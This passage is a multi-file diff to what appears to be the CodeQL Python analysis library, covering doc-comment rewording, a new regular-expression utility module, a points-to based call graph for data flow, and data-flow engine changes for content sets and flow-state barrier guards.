class PotentialSpecialMethodCallNode extends ControlFlowNode {
@@ -112,6 +112,6 @@ class SpecialMethodCallNode extends PotentialSpecialMethodCallNode {
)
}
/** The method that is called. */
/** Gets the method that is called. */
Value getResolvedSpecialMethod() { result = resolvedSpecialMethod }
}

View File

@@ -323,7 +323,7 @@ class Raise extends Raise_ {
override Expr getASubExpression() { py_exprs(result, _, this, _) }
/**
* The expression immediately following the `raise`, this is the
* Gets the expression immediately following the `raise`. This is the
* exception raised, but not accounting for tuples in Python 2.
*/
Expr getException() {
@@ -332,7 +332,7 @@ class Raise extends Raise_ {
result = this.getExc()
}
/** The exception raised, accounting for tuples in Python 2. */
/** Gets the exception raised, accounting for tuples in Python 2. */
Expr getRaised() {
exists(Expr raw | raw = this.getException() |
if not major_version() = 2 or not exists(raw.(Tuple).getAnElt())

View File

@@ -0,0 +1,41 @@
/**
* Provides classes for working with regular expressions.
*/
private import semmle.python.RegexTreeView
private import semmle.python.regex
private import semmle.python.dataflow.new.DataFlow
/**
* Provides utility predicates related to regular expressions.
*/
module RegExpPatterns {
/**
* Gets a pattern that matches common top-level domain names in lower case.
*/
string getACommonTld() {
// according to ranking by http://google.com/search?q=site:.<<TLD>>
result = "(?:com|org|edu|gov|uk|net|io)(?![a-z0-9])"
}
}
/**
* A node whose value may flow to a position where it is interpreted
* as a part of a regular expression.
*/
class RegExpPatternSource extends DataFlow::CfgNode {
private Regex astNode;
RegExpPatternSource() { astNode = this.asExpr() }
/**
* Gets a node where the pattern of this node is parsed as a part of
* a regular expression.
*/
DataFlow::Node getAParse() { result = this }
/**
* Gets the root term of the regular expression parsed from this pattern.
*/
RegExpTerm getRegExpTerm() { result.getRegex() = astNode }
}

View File

@@ -227,7 +227,7 @@ private module SensitiveDataModeling {
}
/**
* Any kind of variable assignment (also including with/for) where the name indicates
* A variable assignment (also including with/for) where the name indicates
* it contains sensitive data.
*
* Note: We _could_ make any access to a variable with a sensitive name a source of

View File

@@ -6,14 +6,14 @@
private import python
private import internal.TypeTracker as Internal
/** Any string that may appear as the name of an attribute or access path. */
/** A string that may appear as the name of an attribute or access path. */
class AttributeName = Internal::ContentName;
/** Either an attribute name, or the empty string (representing no attribute). */
/** An attribute name, or the empty string (representing no attribute). */
class OptionalAttributeName = Internal::OptionalContentName;
/**
* Summary of the steps needed to track a value to a given dataflow node.
* The summary of the steps needed to track a value to a given dataflow node.
*
* This can be used to track objects that implement a certain API in order to
* recognize calls to that API. Note that type-tracking does not by itself provide a

View File

@@ -92,6 +92,32 @@ private class AttributeAssignmentAsAttrWrite extends AttrWrite, CfgNode {
override string getAttributeName() { result = node.getName() }
}
/**
* An attribute assignment where the object is a global variable: `global_var.attr = value`.
*
* Syntactically, this is identical to the situation that is covered by
* `AttributeAssignmentAsAttrWrite`, however in this case we want to behave as if the object that is
* being written is the underlying `ModuleVariableNode`.
*/
private class GlobalAttributeAssignmentAsAttrWrite extends AttrWrite, CfgNode {
override AttributeAssignmentNode node;
override Node getValue() { result.asCfgNode() = node.getValue() }
override Node getObject() {
result.(ModuleVariableNode).getVariable() = node.getObject().getNode().(Name).getVariable()
}
override ExprNode getAttributeNameExpr() {
// Attribute names don't exist as `Node`s in the control flow graph, as they can only ever be
// identifiers, and are therefore represented directly as strings.
// Use `getAttributeName` to access the name of the attribute.
none()
}
override string getAttributeName() { result = node.getName() }
}
/** Represents `CallNode`s that may refer to calls to built-in functions or classes. */
private class BuiltInCallNode extends CallNode {
string name;
@@ -204,6 +230,8 @@ abstract class AttrRead extends AttrRef, Node, LocalSourceNode { }
private class AttributeReadAsAttrRead extends AttrRead, CfgNode {
override AttrNode node;
AttributeReadAsAttrRead() { node.isLoad() }
override Node getObject() { result.asCfgNode() = node.getObject() }
override ExprNode getAttributeNameExpr() {

View File

@@ -0,0 +1,558 @@
/**
* INTERNAL: Do not use.
*
* Points-to based call-graph.
*/
private import python
private import DataFlowPublic
private import semmle.python.SpecialMethods
/** A parameter position represented by an integer. */
class ParameterPosition extends int {
ParameterPosition() { exists(any(DataFlowCallable c).getParameter(this)) }
}
/** An argument position represented by an integer. */
class ArgumentPosition extends int {
ArgumentPosition() { exists(any(DataFlowCall c).getArg(this)) }
}
/** Holds if arguments at position `apos` match parameters at position `ppos`. */
pragma[inline]
predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos }
/**
* Computes routing of arguments to parameters
*
* When a call contains more positional arguments than there are positional parameters,
* the extra positional arguments are passed as a tuple to a starred parameter. This is
* achieved by synthesizing a node `TPosOverflowNode(call, callable)`
* that represents the tuple of extra positional arguments. There is a store step from each
* extra positional argument to this node.
*
* CURRENTLY NOT SUPPORTED:
* When a call contains an iterable unpacking argument, such as `func(*args)`, it is expanded into positional arguments.
*
* CURRENTLY NOT SUPPORTED:
* If a call contains an iterable unpacking argument, such as `func(*args)`, and the callee contains a starred argument, any extra
* positional arguments are passed to the starred argument.
*
* When a call contains keyword arguments that do not correspond to keyword parameters, these
* extra keyword arguments are passed as a dictionary to a doubly starred parameter. This is
* achieved by synthesizing a node `TKwOverflowNode(call, callable)`
* that represents the dictionary of extra keyword arguments. There is a store step from each
* extra keyword argument to this node.
*
* When a call contains a dictionary unpacking argument, such as `func(**kwargs)`, with entries corresponding to a keyword parameter,
* the value at such a key is unpacked and passed to the parameter. This is achieved
* by synthesizing an argument node `TKwUnpacked(call, callable, name)` representing the unpacked
* value. This node is used as the argument passed to the matching keyword parameter. There is a read
* step from the dictionary argument to the synthesized argument node.
*
* When a call contains a dictionary unpacking argument, such as `func(**kwargs)`, and the callee contains a doubly starred parameter,
* entries which are not unpacked are passed to the doubly starred parameter. This is achieved by
* adding a dataflow step from the dictionary argument to `TKwOverflowNode(call, callable)` and a
* step to clear content of that node at any unpacked keys.
*
* ## Examples:
* Assume that we have the callable
* ```python
* def f(x, y, *t, **d):
* pass
* ```
* Then the call
* ```python
* f(0, 1, 2, a=3)
* ```
* will be modeled as
* ```python
* f(0, 1, [*t], [**d])
* ```
* where `[` and `]` denotes synthesized nodes, so `[*t]` is the synthesized tuple argument
* `TPosOverflowNode` and `[**d]` is the synthesized dictionary argument `TKwOverflowNode`.
* There will be a store step from `2` to `[*t]` at pos `0` and one from `3` to `[**d]` at key
* `a`.
*
* For the call
* ```python
* f(0, **{"y": 1, "a": 3})
* ```
* no tuple argument is synthesized. It is modeled as
* ```python
* f(0, [y=1], [**d])
* ```
* where `[y=1]` is the synthesized unpacked argument `TKwUnpacked` (with `name` = `y`). There is
* a read step from `**{"y": 1, "a": 3}` to `[y=1]` at key `y` to get the value passed to the parameter
* `y`. There is a dataflow step from `**{"y": 1, "a": 3}` to `[**d]` to transfer the content and
* a clearing of content at key `y` for node `[**d]`, since that value has been unpacked.
*/
module ArgumentPassing {
/**
* Holds if `call` represents a `DataFlowCall` to a `DataFlowCallable` represented by `callable`.
*
* It _may not_ be the case that `call = callable.getACall()`, i.e. if `call` represents a `ClassCall`.
*
* Used to limit the size of predicates.
*/
predicate connects(CallNode call, CallableValue callable) {
exists(DataFlowCall c |
call = c.getNode() and
callable = c.getCallable().getCallableValue()
)
}
/**
* Gets the `n`th parameter of `callable`.
* If the callable has a starred parameter, say `*tuple`, that is matched with `n=-1`.
* If the callable has a doubly starred parameter, say `**dict`, that is matched with `n=-2`.
* Note that, unlike other languages, we do _not_ use -1 for the position of `self` in Python,
* as it is an explicit parameter at position 0.
*/
NameNode getParameter(CallableValue callable, int n) {
// positional parameter
result = callable.getParameter(n)
or
// starred parameter, `*tuple`
exists(Function f |
f = callable.getScope() and
n = -1 and
result = f.getVararg().getAFlowNode()
)
or
// doubly starred parameter, `**dict`
exists(Function f |
f = callable.getScope() and
n = -2 and
result = f.getKwarg().getAFlowNode()
)
}
/**
* A type representing a mapping from argument indices to parameter indices.
* We currently use two mappings: NoShift, the identity, used for ordinary
* function calls, and ShiftOneUp which is used for calls where an extra argument
* is inserted. These include method calls, constructor calls and class calls.
* In these calls, the argument at index `n` is mapped to the parameter at position `n+1`.
*/
newtype TArgParamMapping =
TNoShift() or
TShiftOneUp()
/** A mapping used for parameter passing. */
abstract class ArgParamMapping extends TArgParamMapping {
/** Gets the index of the parameter that corresponds to the argument at index `argN`. */
bindingset[argN]
abstract int getParamN(int argN);
/** Gets a textual representation of this element. */
abstract string toString();
}
/** A mapping that passes argument `n` to parameter `n`. */
class NoShift extends ArgParamMapping, TNoShift {
NoShift() { this = TNoShift() }
override string toString() { result = "NoShift [n -> n]" }
bindingset[argN]
override int getParamN(int argN) { result = argN }
}
/** A mapping that passes argument `n` to parameter `n+1`. */
class ShiftOneUp extends ArgParamMapping, TShiftOneUp {
ShiftOneUp() { this = TShiftOneUp() }
override string toString() { result = "ShiftOneUp [n -> n+1]" }
bindingset[argN]
override int getParamN(int argN) { result = argN + 1 }
}
/**
* Gets the node representing the argument to `call` that is passed to the parameter at
* (zero-based) index `paramN` in `callable`. If this is a positional argument, it must appear
* at an index, `argN`, in `call` which satisfies `paramN = mapping.getParamN(argN)`.
*
* `mapping` will be the identity for function calls, but not for method- or constructor calls,
* where the first parameter is `self` and the first positional argument is passed to the second positional parameter.
* Similarly for classmethod calls, where the first parameter is `cls`.
*
* NOT SUPPORTED: Keyword-only parameters.
*/
Node getArg(CallNode call, ArgParamMapping mapping, CallableValue callable, int paramN) {
connects(call, callable) and
(
// positional argument
exists(int argN |
paramN = mapping.getParamN(argN) and
result = TCfgNode(call.getArg(argN))
)
or
// keyword argument
// TODO: Since `getArgName` have no results for keyword-only parameters,
// these are currently not supported.
exists(Function f, string argName |
f = callable.getScope() and
f.getArgName(paramN) = argName and
result = TCfgNode(call.getArgByName(unbind_string(argName)))
)
or
// a synthezised argument passed to the starred parameter (at position -1)
callable.getScope().hasVarArg() and
paramN = -1 and
result = TPosOverflowNode(call, callable)
or
// a synthezised argument passed to the doubly starred parameter (at position -2)
callable.getScope().hasKwArg() and
paramN = -2 and
result = TKwOverflowNode(call, callable)
or
// argument unpacked from dict
exists(string name |
call_unpacks(call, mapping, callable, name, paramN) and
result = TKwUnpackedNode(call, callable, name)
)
)
}
/** Currently required in `getArg` in order to prevent a bad join. */
bindingset[result, s]
private string unbind_string(string s) { result <= s and s <= result }
/** Gets the control flow node that is passed as the `n`th overflow positional argument. */
ControlFlowNode getPositionalOverflowArg(CallNode call, CallableValue callable, int n) {
connects(call, callable) and
exists(Function f, int posCount, int argNr |
f = callable.getScope() and
f.hasVarArg() and
posCount = f.getPositionalParameterCount() and
result = call.getArg(argNr) and
argNr >= posCount and
argNr = posCount + n
)
}
/** Gets the control flow node that is passed as the overflow keyword argument with key `key`. */
ControlFlowNode getKeywordOverflowArg(CallNode call, CallableValue callable, string key) {
connects(call, callable) and
exists(Function f |
f = callable.getScope() and
f.hasKwArg() and
not exists(f.getArgByName(key)) and
result = call.getArgByName(key)
)
}
/**
* Holds if `call` unpacks a dictionary argument in order to pass it via `name`.
* It will then be passed to the parameter of `callable` at index `paramN`.
*/
predicate call_unpacks(
CallNode call, ArgParamMapping mapping, CallableValue callable, string name, int paramN
) {
connects(call, callable) and
exists(Function f |
f = callable.getScope() and
not exists(int argN | paramN = mapping.getParamN(argN) | exists(call.getArg(argN))) and // no positional argument available
name = f.getArgName(paramN) and
// not exists(call.getArgByName(name)) and // only matches keyword arguments not preceded by **
// TODO: make the below logic respect control flow splitting (by not going to the AST).
not call.getNode().getANamedArg().(Keyword).getArg() = name and // no keyword argument available
paramN >= 0 and
paramN < f.getPositionalParameterCount() + f.getKeywordOnlyParameterCount() and
exists(call.getNode().getKwargs()) // dict argument available
)
}
}
import ArgumentPassing
/**
* IPA type for DataFlowCallable.
*
* A callable is either a function value, a class value, or a module (for enclosing `ModuleVariableNode`s).
* A module has no calls.
*/
newtype TDataFlowCallable =
TCallableValue(CallableValue callable) {
callable instanceof FunctionValue and
not callable.(FunctionValue).isLambda()
or
callable instanceof ClassValue
} or
TLambda(Function lambda) { lambda.isLambda() } or
TModule(Module m)
/** A callable. */
abstract class DataFlowCallable extends TDataFlowCallable {
/** Gets a textual representation of this element. */
abstract string toString();
/** Gets a call to this callable. */
abstract CallNode getACall();
/** Gets the scope of this callable */
abstract Scope getScope();
/** Gets the specified parameter of this callable */
abstract NameNode getParameter(int n);
/** Gets the name of this callable. */
abstract string getName();
/** Gets a callable value for this callable, if one exists. */
abstract CallableValue getCallableValue();
}
/** A class representing a callable value. */
class DataFlowCallableValue extends DataFlowCallable, TCallableValue {
CallableValue callable;
DataFlowCallableValue() { this = TCallableValue(callable) }
override string toString() { result = callable.toString() }
override CallNode getACall() { result = callable.getACall() }
override Scope getScope() { result = callable.getScope() }
override NameNode getParameter(int n) { result = getParameter(callable, n) }
override string getName() { result = callable.getName() }
override CallableValue getCallableValue() { result = callable }
}
/** A class representing a callable lambda. */
class DataFlowLambda extends DataFlowCallable, TLambda {
Function lambda;
DataFlowLambda() { this = TLambda(lambda) }
override string toString() { result = lambda.toString() }
override CallNode getACall() { result = this.getCallableValue().getACall() }
override Scope getScope() { result = lambda.getEvaluatingScope() }
override NameNode getParameter(int n) { result = getParameter(this.getCallableValue(), n) }
override string getName() { result = "Lambda callable" }
override FunctionValue getCallableValue() {
result.getOrigin().getNode() = lambda.getDefinition()
}
}
/** A class representing the scope in which a `ModuleVariableNode` appears. */
class DataFlowModuleScope extends DataFlowCallable, TModule {
Module mod;
DataFlowModuleScope() { this = TModule(mod) }
override string toString() { result = mod.toString() }
override CallNode getACall() { none() }
override Scope getScope() { result = mod }
override NameNode getParameter(int n) { none() }
override string getName() { result = mod.getName() }
override CallableValue getCallableValue() { none() }
}
/**
* IPA type for DataFlowCall.
*
* Calls corresponding to `CallNode`s are either to callable values or to classes.
* The latter is directed to the callable corresponding to the `__init__` method of the class.
*
* An `__init__` method can also be called directly, so that the callable can be targeted by
* different types of calls. In that case, the parameter mappings will be different,
* as the class call will synthesize an argument node to be mapped to the `self` parameter.
*
* A call corresponding to a special method call is handled by the corresponding `SpecialMethodCallNode`.
*
* TODO: Add `TClassMethodCall` mapping `cls` appropriately.
*/
newtype TDataFlowCall =
TFunctionCall(CallNode call) { call = any(FunctionValue f).getAFunctionCall() } or
/** Bound methods need to make room for the explicit self parameter */
TMethodCall(CallNode call) { call = any(FunctionValue f).getAMethodCall() } or
TClassCall(CallNode call) { call = any(ClassValue c | not c.isAbsent()).getACall() } or
TSpecialCall(SpecialMethodCallNode special)
/** A call. */
abstract class DataFlowCall extends TDataFlowCall {
/** Gets a textual representation of this element. */
abstract string toString();
/** Get the callable to which this call goes. */
abstract DataFlowCallable getCallable();
/**
* Gets the argument to this call that will be sent
* to the `n`th parameter of the callable.
*/
abstract Node getArg(int n);
/** Get the control flow node representing this call. */
abstract ControlFlowNode getNode();
/** Gets the enclosing callable of this call. */
abstract DataFlowCallable getEnclosingCallable();
/** Gets the location of this dataflow call. */
Location getLocation() { result = this.getNode().getLocation() }
}
/**
* A call to a function/lambda.
* This excludes calls to bound methods, classes, and special methods.
* Bound method calls and class calls insert an argument for the explicit
* `self` parameter, and special method calls have special argument passing.
*/
class FunctionCall extends DataFlowCall, TFunctionCall {
CallNode call;
DataFlowCallable callable;
FunctionCall() {
this = TFunctionCall(call) and
call = callable.getACall()
}
override string toString() { result = call.toString() }
override Node getArg(int n) { result = getArg(call, TNoShift(), callable.getCallableValue(), n) }
override ControlFlowNode getNode() { result = call }
override DataFlowCallable getCallable() { result = callable }
override DataFlowCallable getEnclosingCallable() { result.getScope() = call.getNode().getScope() }
}
/**
* Represents a call to a bound method call.
* The node representing the instance is inserted as argument to the `self` parameter.
*/
class MethodCall extends DataFlowCall, TMethodCall {
CallNode call;
FunctionValue bm;
MethodCall() {
this = TMethodCall(call) and
call = bm.getACall()
}
private CallableValue getCallableValue() { result = bm }
override string toString() { result = call.toString() }
override Node getArg(int n) {
n > 0 and result = getArg(call, TShiftOneUp(), this.getCallableValue(), n)
or
n = 0 and result = TCfgNode(call.getFunction().(AttrNode).getObject())
}
override ControlFlowNode getNode() { result = call }
override DataFlowCallable getCallable() { result = TCallableValue(this.getCallableValue()) }
override DataFlowCallable getEnclosingCallable() { result.getScope() = call.getScope() }
}
/**
* Represents a call to a class.
* The pre-update node for the call is inserted as argument to the `self` parameter.
* That makes the call node be the post-update node holding the value of the object
* after the constructor has run.
*/
class ClassCall extends DataFlowCall, TClassCall {
CallNode call;
ClassValue c;
ClassCall() {
this = TClassCall(call) and
call = c.getACall()
}
private CallableValue getCallableValue() { c.getScope().getInitMethod() = result.getScope() }
override string toString() { result = call.toString() }
override Node getArg(int n) {
n > 0 and result = getArg(call, TShiftOneUp(), this.getCallableValue(), n)
or
n = 0 and result = TSyntheticPreUpdateNode(TCfgNode(call))
}
override ControlFlowNode getNode() { result = call }
override DataFlowCallable getCallable() { result = TCallableValue(this.getCallableValue()) }
override DataFlowCallable getEnclosingCallable() { result.getScope() = call.getScope() }
}
/** A call to a special method. */
class SpecialCall extends DataFlowCall, TSpecialCall {
SpecialMethodCallNode special;
SpecialCall() { this = TSpecialCall(special) }
override string toString() { result = special.toString() }
override Node getArg(int n) { result = TCfgNode(special.(SpecialMethod::Potential).getArg(n)) }
override ControlFlowNode getNode() { result = special }
override DataFlowCallable getCallable() {
result = TCallableValue(special.getResolvedSpecialMethod())
}
override DataFlowCallable getEnclosingCallable() {
result.getScope() = special.getNode().getScope()
}
}
/** Gets a viable run-time target for the call `call`. */
DataFlowCallable viableCallable(DataFlowCall call) { result = call.getCallable() }
private newtype TReturnKind = TNormalReturnKind()
/**
* A return kind. A return kind describes how a value can be returned
* from a callable. For Python, this is simply a method return.
*/
class ReturnKind extends TReturnKind {
/** Gets a textual representation of this element. */
string toString() { result = "return" }
}
/** A data flow node that represents a value returned by a callable. */
class ReturnNode extends CfgNode {
Return ret;
// See `TaintTrackingImplementation::returnFlowStep`
ReturnNode() { node = ret.getValue().getAFlowNode() }
/** Gets the kind of this return node. */
ReturnKind getKind() { any() }
}
/** A data flow node that represents the output of a call. */
class OutNode extends CfgNode {
OutNode() { node instanceof CallNode }
}
/**
* Gets a node that can read the value returned from `call` with return kind
* `kind`.
*/
OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) {
call.getNode() = result.getNode() and
kind = TNormalReturnKind()
}

View File

@@ -94,15 +94,19 @@ abstract class Configuration extends string {
predicate isBarrierGuard(BarrierGuard guard) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis.
* Holds if data flow through nodes guarded by `guard` is prohibited when
* the flow state is `state`
*/
predicate isBarrierGuard(BarrierGuard guard, FlowState state) { none() }
/**
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
*/
predicate isAdditionalFlowStep(Node node1, Node node2) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis. This step is only applicable in `state1` and
* updates the flow state to `state2`.
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalFlowStep(Node node1, FlowState state1, Node node2, FlowState state2) {
none()
@@ -112,7 +116,7 @@ abstract class Configuration extends string {
* Holds if an arbitrary number of implicit read steps of content `c` may be
* taken at `node`.
*/
predicate allowImplicitRead(Node node, Content c) { none() }
predicate allowImplicitRead(Node node, ContentSet c) { none() }
/**
* Gets the virtual dispatch branching limit when calculating field flow.
@@ -166,6 +170,14 @@ abstract class Configuration extends string {
*/
int explorationLimit() { none() }
/**
* Holds if hidden nodes should be included in the data flow graph.
*
* This feature should only be used for debugging or when the data flow graph
* is not visualized (for example in a `path-problem` query).
*/
predicate includeHiddenNodes() { none() }
/**
* Holds if there is a partial data flow path from `source` to `node`. The
* approximate distance between `node` and the closest source is `dist` and
@@ -345,9 +357,13 @@ private predicate fullBarrier(NodeEx node, Configuration config) {
pragma[nomagic]
private predicate stateBarrier(NodeEx node, FlowState state, Configuration config) {
exists(Node n |
node.asNode() = n and
exists(Node n | node.asNode() = n |
config.isBarrier(n, state)
or
exists(BarrierGuard g |
config.isBarrierGuard(g, state) and
n = g.getAGuardedNode()
)
)
}
@@ -477,8 +493,9 @@ private predicate additionalJumpStateStep(
)
}
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
read(node1.asNode(), c, node2.asNode()) and
pragma[nomagic]
private predicate readSet(NodeEx node1, ContentSet c, NodeEx node2, Configuration config) {
readSet(node1.asNode(), c, node2.asNode()) and
stepFilter(node1, node2, config)
or
exists(Node n |
@@ -488,6 +505,37 @@ private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration conf
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
exists(ContentSet cs |
readSet(node1, cs, node2, config) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate clearsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
clearsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate expectsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
expectsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
pragma[nomagic]
private predicate notExpectsContent(NodeEx n) { not expectsContentCached(n.asNode(), _) }
pragma[nomagic]
private predicate store(
NodeEx node1, TypedContent tc, NodeEx node2, DataFlowType contentType, Configuration config
) {
@@ -565,9 +613,9 @@ private module Stage1 {
)
or
// read
exists(Content c |
fwdFlowRead(c, node, cc, config) and
fwdFlowConsCand(c, config)
exists(ContentSet c |
fwdFlowReadSet(c, node, cc, config) and
fwdFlowConsCandSet(c, _, config)
)
or
// flow into a callable
@@ -591,10 +639,10 @@ private module Stage1 {
private predicate fwdFlow(NodeEx node, Configuration config) { fwdFlow(node, _, config) }
pragma[nomagic]
private predicate fwdFlowRead(Content c, NodeEx node, Cc cc, Configuration config) {
private predicate fwdFlowReadSet(ContentSet c, NodeEx node, Cc cc, Configuration config) {
exists(NodeEx mid |
fwdFlow(mid, cc, config) and
read(mid, c, node, config)
readSet(mid, c, node, config)
)
}
@@ -612,6 +660,16 @@ private module Stage1 {
)
}
/**
* Holds if `cs` may be interpreted in a read as the target of some store
* into `c`, in the flow covered by `fwdFlow`.
*/
pragma[nomagic]
private predicate fwdFlowConsCandSet(ContentSet cs, Content c, Configuration config) {
fwdFlowConsCand(c, config) and
c = cs.getAReadContent()
}
pragma[nomagic]
private predicate fwdFlowReturnPosition(ReturnPosition pos, Cc cc, Configuration config) {
exists(RetNodeEx ret |
@@ -704,9 +762,9 @@ private module Stage1 {
)
or
// read
exists(NodeEx mid, Content c |
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
exists(NodeEx mid, ContentSet c |
readSet(node, c, mid, config) and
fwdFlowConsCandSet(c, _, pragma[only_bind_into](config)) and
revFlow(mid, toReturn, pragma[only_bind_into](config))
)
or
@@ -732,10 +790,10 @@ private module Stage1 {
*/
pragma[nomagic]
private predicate revFlowConsCand(Content c, Configuration config) {
exists(NodeEx mid, NodeEx node |
exists(NodeEx mid, NodeEx node, ContentSet cs |
fwdFlow(node, pragma[only_bind_into](config)) and
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
readSet(node, cs, mid, config) and
fwdFlowConsCandSet(cs, c, pragma[only_bind_into](config)) and
revFlow(pragma[only_bind_into](mid), _, pragma[only_bind_into](config))
)
}
@@ -754,7 +812,8 @@ private module Stage1 {
* Holds if `c` is the target of both a read and a store in the flow covered
* by `revFlow`.
*/
private predicate revFlowIsReadAndStored(Content c, Configuration conf) {
pragma[nomagic]
predicate revFlowIsReadAndStored(Content c, Configuration conf) {
revFlowConsCand(c, conf) and
revFlowStore(c, _, _, conf)
}
@@ -853,8 +912,8 @@ private module Stage1 {
pragma[nomagic]
predicate readStepCand(NodeEx n1, Content c, NodeEx n2, Configuration config) {
revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config)) and
read(n1, c, n2, pragma[only_bind_into](config))
read(n1, c, n2, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config))
}
pragma[nomagic]
@@ -864,7 +923,10 @@ private module Stage1 {
predicate revFlow(
NodeEx node, FlowState state, boolean toReturn, ApOption returnAp, Ap ap, Configuration config
) {
revFlow(node, toReturn, config) and exists(state) and exists(returnAp) and exists(ap)
revFlow(node, toReturn, pragma[only_bind_into](config)) and
exists(state) and
exists(returnAp) and
exists(ap)
}
private predicate throughFlowNodeCand(NodeEx node, Configuration config) {
@@ -1110,8 +1172,8 @@ private module Stage2 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
bindingset[node1, state1, config]
bindingset[node2, state2, config]
@@ -1139,11 +1201,26 @@ private module Stage2 {
private predicate flowIntoCall = flowIntoCallNodeCand1/5;
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
expectsContentEx(node, c)
)
}
bindingset[node, state, ap, config]
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
PrevStage::revFlowState(state, config) and
PrevStage::revFlowState(state, pragma[only_bind_into](config)) and
exists(ap) and
not stateBarrier(node, state, config)
not stateBarrier(node, state, config) and
(
notExpectsContent(node)
or
ap = true and
expectsContentCand(node, config)
)
}
bindingset[ap, contentType]
@@ -1198,7 +1275,7 @@ private module Stage2 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -1566,7 +1643,7 @@ private module Stage2 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -1604,10 +1681,24 @@ private module Stage2 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -1698,7 +1789,8 @@ private module LocalFlowBigStep {
private class FlowCheckNode extends NodeEx {
FlowCheckNode() {
castNode(this.asNode()) or
clearsContentCached(this.asNode(), _)
clearsContentCached(this.asNode(), _) or
expectsContentCached(this.asNode(), _)
}
}
@@ -1706,18 +1798,31 @@ private module LocalFlowBigStep {
* Holds if `node` can be the first node in a maximal subsequence of local
* flow steps in a dataflow path.
*/
predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
Stage2::revFlow(node, state, config) and
(
sourceNode(node, state, config) or
jumpStep(_, node, config) or
additionalJumpStep(_, node, config) or
additionalJumpStateStep(_, _, node, state, config) or
node instanceof ParamNodeEx or
node.asNode() instanceof OutNodeExt or
store(_, _, node, _, config) or
read(_, _, node, config) or
sourceNode(node, state, config)
or
jumpStep(_, node, config)
or
additionalJumpStep(_, node, config)
or
additionalJumpStateStep(_, _, node, state, config)
or
node instanceof ParamNodeEx
or
node.asNode() instanceof OutNodeExt
or
Stage2::storeStepCand(_, _, _, node, _, config)
or
Stage2::readStepCand(_, _, node, config)
or
node instanceof FlowCheckNode
or
exists(FlowState s |
additionalLocalStateStep(_, s, node, state, config) and
s != state
)
)
}
@@ -1731,12 +1836,15 @@ private module LocalFlowBigStep {
additionalJumpStep(node, next, config) or
flowIntoCallNodeCand1(_, node, next, config) or
flowOutOfCallNodeCand1(_, node, next, config) or
store(node, _, next, _, config) or
read(node, _, next, config)
Stage2::storeStepCand(node, _, _, next, _, config) or
Stage2::readStepCand(node, _, next, config)
)
or
exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
additionalJumpStateStep(node, state, next, s, config)
or
additionalLocalStateStep(node, state, next, s, config) and
s != state
)
or
Stage2::revFlow(node, state, config) and
@@ -1770,42 +1878,40 @@ private module LocalFlowBigStep {
*/
pragma[nomagic]
private predicate localFlowStepPlus(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
DataFlowType t, Configuration config, LocalCallContext cc
NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
Configuration config, LocalCallContext cc
) {
not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
(
localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
(
localFlowStepNodeCand1(node1, node2, config) and
